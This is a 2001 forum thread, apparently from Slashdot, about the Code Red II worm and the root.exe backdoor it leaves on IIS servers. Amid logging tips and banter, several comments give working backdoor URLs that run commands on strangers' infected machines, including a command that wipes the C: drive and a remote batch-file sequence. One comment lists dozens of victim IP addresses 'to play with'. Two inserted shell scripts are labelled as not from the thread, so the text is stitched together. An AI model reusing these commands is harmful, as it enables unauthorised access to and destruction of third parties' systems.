Code Red II: Shells for the Taking
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accessible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to microsoft.com, download and install the patch, and reboot itself? That'd be neat.
...
Are here.
Frustrated by the lack of any current stats on this from DShield, or Incidents short of the update on the 4th, I collected some stats that might give some indication of where this thing is going. Peak times at 1300 and 1400 MST. Not sure what this means, but seems consistent.
www.dedserius.com
VB != VisualBasic
But doesn't the root.exe need to be marked non-executable? Or will changing its extension be enough?
Thanks though. I added this to my script at cr_response_perlscript although I'd really prefer to stop the spread of the worm too...
Max Vision of whitehats.org (IIRC) got busted for doing just this (writing a worm that patched systems to prevent a malicious worm from infecting them). The FBI didn't charge him with anything initially while he was ratting out people, but as soon as he baulked at ratting out a close friend, they fried his ass. Nice ethics those FBI thugs have. Article that explains it better is here at securityfocus.com.
Wow, that's excellent. Can you put up a pointer to your netcat config? I have one machine that is a webserver and it's pretty easy to track CR with it. But I'd like to be able to track on some of my other machines, and I see no reason for adding apache just to track this thing.
TIA.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor sap's computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".
I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
It was Max Vision. There is a nice article about it at securityfocus.
Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidently didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.
You wasted packets to get this lousy sig.
You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.
Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DOS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
None of the above.
The two historical precedents that come to mind are:
- The Grand Canyon midair collision on 30 June 1956
- The sinking of the Titanic
In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies. Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....
The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.
windows has a telnet server. this fact draws any sliver of humor out of your attempted joke.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
<SarcasticBitchslap>Yeah, since Apache is the only web server that logs access. </SarcasticBitchslap>
m00.
A Pepsi product (mountain dew), actually
crack the code
Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?
I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.
Unfortunately, many shellfish become very toxic if they are dead and uncooked. Maryland Blue Crabs are a classic example--they are always cooked live.
I would also argue that your average sadist wouldn't get a whole lot out of it because crabs and lobsters really aren't that bright. The pleasure of sadism comes out of the mental domination of the other party. Generally, an intelligent creature is required. (this is all from a college psychology class years ago)
Mushrooms aren't plants, they're fungi.
First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.
Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.
BOOM!
If this keeps happening, this is going to be bad for business in a lot of places.
"It is a greater offense to steal men's labor, than their clothes"
The matter of fact is that at least this has shielded most of the users from external infections, but pointless when you still have users within the subnet infecting each other over and over again :)
Shall we all now post IP addresses of victims? This is senseless. I do get about 5 entries per 10 seconds in my logfile from thousands of different servers. Reverse lookups show many victims on cable or DSL modems (@home) and just 30% of all IPs are real webservers. So at least all dialup victims can't be informed, and my mails to the postmaster or webmaster of the others, where a reverse lookup revealed who is running that, came back. It's unbelievable: I have 70 websites running on my box and still I get more Code Red calls than for normal webpages. Thank god it's Linux.
Lord "not Gargamel's Cat!" Azrael
I'm surprised that Microsoft has escaped a huge class-action lawsuit for all the damage their products have piled upon their users and non-microsoft users. Its about time that somebody takes this on. I live in a Unix world but I'm tired of all the problems Gates and co. cause me.
If accessed from the telnet method, the trojan runs with the same privileges as IIS... as a system service which is admin privs.
Actually, they moved it to Akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some legitimate requests as well as the trash.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
What did she think it was? Iced coffee? Of course you'll burn yourself if you spill coffee on your lap. That's why you should be careful! What's next? Suing tea kettle companies if you are such a klutz that you spilled boiling water all over yourself?
Yuck! How about if it just deinstalls IIS altogether and sends an email to root (or whatever it's called on NT) explaining that they have forfeited their right to host web services since they can't be bothered to secure them with known patches for worms that are making headlines in non-tech journals even? And considering that .ida sounds like something that should be turned OFF by default and certainly should NOT include a default.ida page (which I'm guessing some "thoughtful" developer included to prevent 404 errors in the default install/demo install), they might consider finding server software that comes preconfigured to be a little more sensible than that.
I do not have a signature
I braved the evil frames of the securityfocus website to bring you:
http://www.securityfocus.com/archive/1/198282
Or as Homer would say, "MMmmmm, sadisti-licious!"
m00.
This is slashdot. Why do you think they are called slashbots?
couldn't you just use: http://infectedhost/scripts/root.exe?/c+net+send+A dministrator+"Please%20patch%20your%20IIS%20agains t%20Code%20Red"
telnet www.microsoft.com 80
I'm a dsl customer and I'm also seeing a lot of attempts to spread the code red I and II worms. After noticing that my dsl modem was flickering constantly even after powering down all of my connected computers I became curious and fired up nuke nabber which displayed the signature for the code red worm coming in on port 80. I watched for a while and also noticed that the activity lights on my dsl modem were flickering much more frequently than any requests being reported by nuke nabber. I then installed a packet sniffer so I could take a closer look at what was going on. Here's where I get in over my head...
I see constant ARP broadcasts with MAC addresses. I don't really know much about this and am not sure how to interpret what's going on. Can anyone suggest some good resources that might help me decipher this traffic? I wondered if it was perhaps my service provider broadcasting the DHCP address (I'm sure my ignorance of this subject matter is now glaring...) but from my research on how DHCP works I don't think this is what's happening. Any suggested references or information would be greatly appreciated.
Thanks,
Aexion
All this talk about 'helping' the infected systems reminds me of Greg Bear's Forge of God where all those little spider robots help the poor humans who's planet is infected by the planet killers. ...965 hits on my Apache so far...
The McDonald's coffee case judge was not braindead. Get the facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature. Not that having some judgement like that against MicroSoft wouldn't be nice. Of course, it might not help much in getting MS to clean up their act.
> It is on or near this day that Microsoft's
> software became, without a doubt, a public
> nuisance to the internet.

I've not seen anyone mention the underlying causes for buffer overflows. There are two: 1. The C language, written for programmer gods. Unfortunately, MS hasn't one. If they had used Pascal (Eiffel/Ada/...) and had range checking on, they would have been safe. 2. The Intel processor that lets code on the stack be executable. Without these two, the Internet would have been a lot safer. And it would have saved lots of security code reviews too. Greetings, Berend. (-:
If I had a sig, I would put it here.
Not completely true.
@home at home, it is true no public servers.
But a business connection can...
I have a high school in Kansas, a pair of cops in Ohio just banging away. Firewall is eating them all. I have many more that it looks like AT$T have taken off the air.
Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTS headend router to ARP out to see who's got that address, you get the picture.
At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.
I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.
Chad Loder
Rapid 7, Inc. - Next generation security products and services
http://www.rapid7.com
Well, Emacs probably beat Microsoft to the punch by 20 years. Go Open Source! Woo!
My guess is that command requires the craptive desktop.
Okay so the worm gets in because of a bug, but the damage it does after that is because of MS's deliberately stupid OS design. Where Microsoft is concerned, don't ascribe to stupidity what can be ascribed to malice. The facts prove this to be true, every time!
"I still think sircam is more annoying since it affects every email user" Every user? That's weird because my Netscape email client didn't run it, I must be stupid to run such a client that does not support such nifty and "useful" features as ActiveX and WSH.
No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.
Grin, you are thinking too small. Consider a big company, a real big one (100.000+ employees); well, a big company like that cannot say how many servers they have, even less what their IP addresses are, and it's ridiculous to think they know what software is running on them. How are you going to patch your servers? Well, they send a mail: please contact us if you know about a computer that uses IIS. It will take a while before they get to fix everything, not to mention that a whole score of people reply like 'What is red worm', 'What is IIS', 'Why don't we run Linux' etc etc. Open your eyes!
I don't know what you all are talking about...I've been drinking CodeRed for months now. It's red, highly caffeinated, and tastes like Mountain Dew. Only fruitier.
I'm just more 1337 than all of you.
:-)
format c: /q
nope wont work
PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)
SlashDot (the pikers )-: wouldn't let me post directly to this page.
Got time? Spend some of it coding or testing
cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'
Hmm, tr barfs for me because [ and ] are special (maybe a Solaris peculiarity?). So I used:
grep default.ida access_log | tr -d '\[\]' | awk '{print $1 " " $4 " " $5}'
Saved a couple of processes too. *Why* do so many people insist on adding spurious "cat" processes to the beginning of pipelines? It's always at the beginning, too, nobody adds them at the end.
-- Sigs are for losers
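As an added example, not code from the thread, here is a small POSIX shell script in the spirit of the pipeline above that turns an Apache access log into defender-side statistics: which source addresses are probing for default.ida, and how many probes arrive per hour (the kind of "peak times" observation made earlier in the thread). It assumes Apache common/combined log format and uses sed rather than tr to strip the brackets, since bracket handling in tr differs between implementations as the reply notes. The log lines are constructed sample data, not real traffic.

```shell
#!/bin/sh
# Added example: count Code Red probes in an Apache access log.
# Assumption: common/combined log format, i.e.
#   IP - - [dd/Mon/yyyy:HH:MM:SS zone] "GET /path HTTP/1.0" status bytes

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG='210.15.27.11 - - [04/Aug/2001:13:02:11 -0600] "GET /default.ida?XXXXXXXX%u9090 HTTP/1.0" 400 312
10.0.0.5 - - [04/Aug/2001:13:02:15 -0600] "GET /index.html HTTP/1.0" 200 1042
210.15.27.11 - - [04/Aug/2001:13:05:40 -0600] "GET /default.ida?XXXXXXXX%u9090 HTTP/1.0" 400 312
24.176.135.110 - - [04/Aug/2001:14:11:02 -0600] "GET /default.ida?XXXXXXXX%u9090 HTTP/1.0" 400 312
10.0.0.7 - - [04/Aug/2001:14:12:00 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0'

# Print "ip date time" for every Code Red probe read from stdin.
# The dot in default.ida is escaped so grep matches it literally, and sed
# removes the [ ] around the timestamp portably.
codered_hits() {
    grep 'default\.ida' | sed 's/\[//; s/\]//' | awk '{print $1, $4, $5}'
}

# Count probes per source IP, most active source first.
codered_hits_per_ip() {
    grep 'default\.ida' | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Count probes per hour of day. In field 4 ("[04/Aug/2001:13:02:11") the
# hour starts at character 14.
codered_hits_per_hour() {
    grep 'default\.ida' | awk '{print substr($4, 14, 2)}' | sort | uniq -c
}

# Probes for the root.exe backdoor dropped by Code Red II: a host sending
# these is itself infected or being driven by someone who found it.
rootexe_probes() {
    grep '/scripts/root\.exe' | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | codered_hits_per_ip
printf '%s\n' "$SAMPLE_LOG" | codered_hits_per_hour
printf '%s\n' "$SAMPLE_LOG" | rootexe_probes
```

Feed a real log with `codered_hits_per_ip < /var/log/apache/access_log`; the per-IP list is what you would hand to an abuse desk, and the per-hour counts are what the DShield-style stats in the thread are built from.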
same exploit over a couple of weeks
:)
Weeks.. heck, months. Some are saying that CRII is reusing the "copy cmd.exe to \scripts" trick that first appeared with the Sadmind/IIS worm... BACK IN MAY!!
Now THAT is insane!
Intelligent Life on Earth
It's COFFEE you moron! You can name as much as you want that is protected from casual contact, it doesn't mean something you pour down your throat should give you third degree burns. The woman was driving in a car, and didn't expect to be disfigured by her cup of coffee. I think that's pretty fair. How can you actually be dumb enough to advocate that hot of coffee? Maybe you should have responded to "too cold" complaints with "drink it sooner" instead of just turning it up until it can't be cold no matter how long they take to get to it. I mean I was amazed then that people would be so stupid as to take a stand against her, but now? Still? That's just belligerently stupid.
And for the record the woman did NOT get millions, just a few thousand that maybe covered her hospital bills. The media just stopped covering it before McD appealed and got her thrown out of court. Just a rude and stupid urban legend now that people use to reinforce idiotic arguments.
...was to convince the world they are not at fault.
It is scary that their marketing machine works that well. I hope someone goes after Microsoft soon, 'cuz the way things are going they're gonna keep pumping out buggy code until hell freezes over...
Yes, you're right. Look at this disclaimer I found from the license of an open source project:
Oh wait a minute, ah, found it here. Try this instead: rundll32.exe Shell32.dll,ExitWindowsEx,0x1
The drink is called Mountain Dew: Code Red and unlike RedBull or CocaCola the drink itself is actually red. Seeing as how the original Mountain Dew tastes like a mixture of Sprite and urine, I haven't given Code Red a try yet.
I wonder if Mountain Dew sees the Code Red worm as negative advertising. On the one hand they get the name of their new product plastered all over the media; on the other hand a lot of people (i.e. the above poster) know that Code Red is a computer worm and don't even know it's a soft drink.
Code Red and Sadmind/IIS do not use the same vulnerability
The poster was not referring to the type of attack. He was referring to the back door that only CR-II installs on the victim server. CR-II does indeed install the same back door that Sadmind installed.. that is, copying cmd.exe to %iisroot/scripts as root.exe.
Intelligent Life on Earth
You apparently don't know the difference between hot (uncomfortable) water and instantly damaging (near-boiling) water. Try it some time, and post back with results.
I've been going to some of the people that are trying to attack me and the majority are not operating. In other words, people who probably completely forgot that they even have IIS.
Yeah, I probably should have explained that I was running Apache at the time, which is what made it something to laugh at rather than worry about.
I didn't see any actual 'sploit attempts from that IP, so either he was a harmless joker with a web browser, or he was changing the GET string based on how the server identified itself. But if he was doing that, why even send a string to an Apache server. So my hunch is he was just a guy who'd drunk too much coffee.
(Hmm, configure Apache to misidentify itself as an IIS box the next time a worm shows up... lousy web serving idea, but a nice honeypot idea ;-)
With no legislation being passed after the massive DDoS attacks last year on EBay, et al - I seriously doubt anything is going to passed now. I thought that situation was the best chance for legislation. Since many of those companies don't make any money unless people can get to their site, I expected them to lobby heavily for some stiff penalties. When big companies stand to lose big money, you usually see laws passed. So if it didn't happen then, I seriously doubt it will happen now.
The perception of reality is more important than reality itself.
Definitely so. Code Red just randomly picks IP addresses to infect, so you'll see it generating ARP requests to actually get to those IPs .. Even if those IPs aren't connected to anything, hence the ARP requests just keep retrying until they timeout and give up.
Happy Code Worm Day!
the CodeCam worm, a virus that sends private documents on your computer to IIS webservers and posts them on the web.
The IIS weakness is found. The CodeRedII System goes on-line August 4th, 2001. Human decisions are removed from strategic hacking. CodeRedII begins to spread at a geometric rate. It becomes self-aware at 2:14AM, Eastern Time, August 29th.
There has been a major scientific break-in
Here are some for you to play with:
210.15.27.11
210.15.17.156
210.15.70.130
210.15.79.10
210.242.87.148
210.92.49.34
210.15.70.130
210.15.79.10
61.151.173.137
210.124.96.195
210.106.80.201
210.202.66.18
cj3134709-a.ntkyo1.kn.home.ne.jp [210.20.139.79]
210.15.76.239
210.15.63.83
210.15.55.13
210.115.164.54
198.c210-85-176.ethome.net.tw [210.85.176.198]
210.122.63.65
210.91.175.16
210.12.28.65
210.237.124.68
210.15.67.150
210.77.142.2
210.122.63.86
210.15.70.141
210.15.79.10
176.c210-85-25.ethome.net.tw [210.85.25.176]
210.232.202.179
210.15.67.150
210.15.17.140
210.123.115.186
210.102.139.83
210.15.17.140
210.15.67.150
210.15.79.10
210.83.133.35
210.15.12.18
pl211.nas921.d-osaka.nttpc.ne.jp [210.165.118.211]
210.15.19.173
210.119.226.72
210.15.56.8
210.15.79.10
210.15.56.8
64-60-43-221-cust.telepacific.net [64.60.43.221]
210.183.167.20
210.15.79.10
210.15.17.156
210.119.189.87
210.15.19.173
210.15.77.146
shiva.sp-net.ne.jp [210.227.141.5]
208.238.182.66
210.181.182.243
210.15.77.146
210.103.161.177
c554707-a.plstn1.sfba.home.com [24.176.135.110]
210.200.130.3
210.15.25.92
210.15.18.242
210.15.25.92
210.15.17.140
210.15.17.140
210.15.70.130
210.241.64.1
210.15.70.130
210.122.95.170
210.15.27.38
210.15.56.23
210.15.18.242
210.15.27.38
210.15.63.70
210.71.231.69
s210-218-165-218.thrunet.ne.kr [210.218.165.218]
47.c210-85-26.ethome.net.tw [210.85.26.47]
210.15.78.121
210.78.24.21
210.118.64.125
210.106.81.187
h240-210-68-8.adcast.com.tw [210.68.8.240]
210.15.6.205
210.201.195.124
210.93.198.18
210.15.12.18
210.15.41.235
210.15.72.1
TP-AS233-Dialup-34.my.net.tw [210.244.230.34]
210.15.78.121
210.15.78.121
210.123.218.70
h240-210-68-8.adcast.com.tw [210.68.8.240]
s210-205-192-225.thrunet.ne.kr [210.205.192.225]
210.115.4.194
210.119.188.69
ss00-042.ppp.mediawars.ne.jp [210.233.65.170]
Have fun folks.
(pardon the caps, but I'm pissed) AND I AM SICK AND TIRED OF EVERYBODY BLAMING MICROSOFT AND THEIR PRODUCTS FOR PROBLEMS THAT ARE NOT ALWAYS THEIR FAULT. Yes yes yes, every software is going to have problems, *nixes have all had theirs. The problem here lies in the fact that the majority of servers that have been compromised are either (a) small personal-type sites or (b) don't even realize that they are running a server. It's hard to tell people to protect their systems when they don't even think that it's their system that they need to protect. And before you go bashing MS about this one (i.e. that it's installed by default) keep in mind that if the user knew what they were doing, they'd either disable it or would know to secure it. People who use *nix tend to be technosavvy and therefore will be very conscientious about what software they're running and apply the patches at the proper times, whereas W2K admins aren't always "on the ball". But stop blaming Microsoft for everything here.
If God gave us curiosity
Here is what some ARP requests look like:

21:58:37.540138 arp who-has 24.160.158.68 tell 24.160.158.1
21:58:37.581758 arp who-has 24.167.113.97 tell 24.167.112.1
21:58:37.618142 arp who-has 66.69.10.33 tell 66.69.10.1
21:58:37.708154 arp who-has 24.162.168.66 tell 24.162.168.1

Each computer keeps a local ARP table of where to send packets to specific computers (MAC addresses). If it doesn't know, it sends out a broadcast 0.0.0.255 to ask everyone else if they know. (Now, others may think they know and actually be incorrect = ARP poisoning, which leads to man-in-the-middle attacks and nasty stuff.) This follows up the chain, kinda like DNS requests, till it finds out where to send the data. So that's basically how it works, and since many machines on your cable modem subnet 1.2.3.x (up to 254 machines) may be running Win2K IIS and be infected, when the worm randomly chooses new IPs to connect to, it has to find out where to go. The worm sends to about 300 or 600 new IPs, so that many times the infected machines on your subnet... that's how many ARP requests/replies you're going to see being sent around. Hope it helps, look up Address Resolution Protocol and perhaps the RFC (request for comments) about it. http://whatis.techtarget.com/definition/0,289893,sid9_gci213780,00.html
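As an added example, not part of the post above, this POSIX shell script reads tcpdump ARP lines in the format shown in the post and summarises them the way a cable-modem user trying to make sense of the "flickering lights" would want: which gateway is doing the asking, and which requested addresses never got a reply. The unanswered ones are the signature of a worm scanning addresses that nobody owns, which is the mechanism described later in the thread. It assumes the old `HH:MM:SS.us arp who-has X tell Y` / `arp reply X is-at MAC` line format; the capture lines are constructed sample data.

```shell
#!/bin/sh
# Added example: summarise an ARP request storm from tcpdump output.
# Assumption: lines look like
#   21:58:37.540138 arp who-has 24.160.158.68 tell 24.160.158.1
#   21:58:37.900000 arp reply 24.160.158.70 is-at 00:11:22:33:44:55
# (the format used in the post; newer tcpdump versions word it differently).

# Constructed sample capture (not real traffic). Only one of the five
# who-has requests gets a reply; the others target addresses nobody owns.
SAMPLE_ARP='21:58:37.540138 arp who-has 24.160.158.68 tell 24.160.158.1
21:58:37.581758 arp who-has 24.167.113.97 tell 24.167.112.1
21:58:37.618142 arp who-has 66.69.10.33 tell 66.69.10.1
21:58:37.708154 arp who-has 24.162.168.66 tell 24.162.168.1
21:58:37.712000 arp who-has 24.160.158.70 tell 24.160.158.1
21:58:37.900000 arp reply 24.160.158.70 is-at 00:11:22:33:44:55'

# Count who-has requests per asking address ("tell X"), busiest first.
# On a cable segment the top entry is normally the CMTS headend router.
arp_requests_per_asker() {
    awk '$2 == "arp" && $3 == "who-has" { n[$6]++ }
         END { for (a in n) print n[a], a }' | sort -rn
}

# List requested addresses that never produced a matching "reply X is-at".
# A long list here means something is probing addresses that do not exist.
arp_unanswered() {
    awk '$2 == "arp" && $3 == "who-has" { asked[$4] = 1 }
         $2 == "arp" && $3 == "reply"   { answered[$4] = 1 }
         END { for (ip in asked) if (!(ip in answered)) print ip }' | sort
}

# Count unanswered requests as a single number, handy for a threshold alert.
arp_unanswered_count() {
    arp_unanswered | wc -l | tr -d ' '
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_ARP" | arp_requests_per_asker
printf '%s\n' "$SAMPLE_ARP" | arp_unanswered
```

With a live capture use `tcpdump -n -l arp | arp_unanswered_count`-style plumbing after a fixed interval; a count that keeps climbing while your own machines are switched off is the worm's random-address scanning, not your ISP's DHCP.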
my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product. it would be able to make these malformed packets by utilizing raw sockets
Are you pondering what I'm pondering?
It's gonna be a regular script kiddie square dance in the weeks and months ahead. Thousands upon thousands of hosts from which attacks can be launched are now up for the taking.
Someone needs to write a new strand of Code Red that infects servers with the patch from MS.
I'm sick of all this wasted logfile space.
I think it is about time to write the exploit that will take all those vulnerable IIS servers with a open command shell and remotely patch them once and for all :-)
:) Then it would be really interesting to read those log files!
At least to get it over with this Code Red thingy!
On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer
Code Red is the new cherry flavored Mountain Dew.
KangarooBox - We make IT simple!
(sorry, but I gotta)
nuclear presidential echelon assassination encryption virulent strain
Whizzmo
If you went to Edit -> Preferences -> Netscape -> Applications, you could set up a MIME type that ran the attachment. It would have to specify the interpreter, see the Postscript entry for an example. So, you could do it, but you'd have to work at it, Netscape isn't vulnerable by default.
Just cause it's in a EULA doesn't make it enforceable.
If you consider that @Home's acceptable use policy explicitly says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.
One bug in IIS lets you (through HTTP requests) access the filesystem and run simple commands (this is very sad). The first thing that a cracker would do is copy cmd.exe into the scripts directory.
One of the servers at my school got hacked this way. I just had to laugh at the simplicity of the hack.
It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.
Microsoft is a bad neighbor, who has allowed their yard to fill with filth and trash, subjecting the people around them to the vermin and roaches that breed within their unkempt property. It is on this day that the internet will begin to sputter and fail in places due to the tremendous burden Microsoft's incompetence has placed upon it.
Microsoft's products spew pollution into the information space like a burning mountain of tires.
Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privileges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
I just got permission to put something up on my work's web page that allows us to track the number of hits by Code Red (and Code Red II) but I haven't had time to put anything so sophisticated together. Bravo.
Current Code Red Worm Hits Count
Mind releasing code/information on how you did that one?
On other fronts, one of my co-workers is informing me that he's getting hundreds of such hits on his boxen sitting on the COX@home network, most of them seem to be originating from other COX@home addresses. I did see some mention that there has been lots of COX activity. I wonder what's the reason for that.
Amerist A'Toll
"What are dreams when we are but the dreams of dreamers yet to be born?"
You can't sue MS (they are bigger than the govt practically). But you can probably sue any company which uses IIS and stores your personal data. If that company was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.
War is necrophilia.
sfba.home.com seems to be blocked. And I'm desperately seeking a new ISP...Telocity looks nice, but the last time I tried to get DSL via PacBell, they said I was too far from the switching office.
There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.
Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
If you were bored, you could setup a program to send something like: http://infected_system/scripts/root.exe?/c+net+sen d+localhost+you+have+been+infected+by+codered+2+pa tch+IIS
Here is another good article on it at securityfocus.com.
actually there isn't a "non executable" flag for windows.... changing the extension is good enough.
If God gave us curiosity
Trusty google. First hit is the paper I was looking for. Enjoy.
Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software? This thing must have consumed quite a lot of bandwidth, and if you're on a "pay per mb" connection, it's going to cost you a lot.
Ever since code red II came out, my paranoid shield buzzes about once every 5 to 10 minutes when I'm on the net. Ugh. There it goes again. Bored chick, also known as Anonymous Coward
"Code Red" is cherry flavored Mountain Dew
Does anybody know what the target will be for this version of Code Red Worm? It'd be pretty funny if it was microsoft.com.
...
Yes, it is Slashdot's fault. It deliberately inserts spaces into anything that is greater than 80 characters (or so) long. This is to stop crap flooders from causing you to need to scroll sideways.
folders get their dates updated when files in them get updated, so this is not necessarily a new installation...
If God gave us curiosity
The following HTTP request will erase everything on the infected machine's C: drive, which prevents it from attacking more machines, and possibly makes the user consider installing Linux rather than reinstalling WinNT/2K:
http://{infected ip here}/scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*
Yeah, I know, it's NASTY, but...
I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot.
Bring it, asshole. Has it ever occured to you that these viruses are only possible because jackasses like yourself run entire networks on crap (M$) software? If your employer were better informed he/she would get rid of all their MCSE dickheads and move to a better platform. I'm not even advocating just one; there are enough flavors of open/free/secure OSes out there that no one has an excuse to be running a network on M$ shit anymore. And if you ever get one of the little punks out in the street I think you'll quickly find that you are no match for them.
This is freakin incredible!!! I can't believe how easy it is to get root access to these Win2K boxes... Whoever invented this must be on our side! I have tried some of the commands posted here and can do directory scans and copy files to my console. This is freakin coool!
Has anyone figured out how to shut the friggin things down. It would sure help the health of the network, the ISP's don't seem to realize the threat. I have called Pacific Bell and Covad and other ISP's and all the tech people do is mumble and say that they don't understand what I'm talking about. I tried to explain to them that these machines are spreading an infection, but they were just lowly tech support people... The real people were at home, or unreachable.
Someone figure out a way to shut down the windows boxes. I think this is the best solution...
I don't have apache either (laugh if you like, but I am on a windows box), and I use netcat to capture each probe. eg, nc -vvlp 80 > worm.capt, then use less or if you have to type, to read the code body. (Note, netcat is available for all versions of windows AFAIK, and unix.)
You're sending GET requests ..
it's in my head
What on earth does raw socket support have to do with anything discussed here? Do you even know what it means?
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
No way, you'd just be hurting yourself by clogging up your pipe -- the goal is to wast time, not to kill your connection. I see no reason why this wouldn't work just as well: #!/usr/bin/perl use FileHandle; STDOUT->autoflush(); $message = "Content-type: text/plain\n\nAm I speaking too slowly?\n"; @mess = split( / */, $message); for ( $i=0; $i
try this:
GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexploit+>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u002Br+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0
this way it renames the old root.exe, creates a new dummy one, and write-protects it so it can't be overwritten by a simple copy command.
If God gave us curiosity
I'm having 2 to 4 alerts every minute from the @home network or road runner.
It's crazy.
onepoint
if you see me, smile and say hello.
net stop iiswww
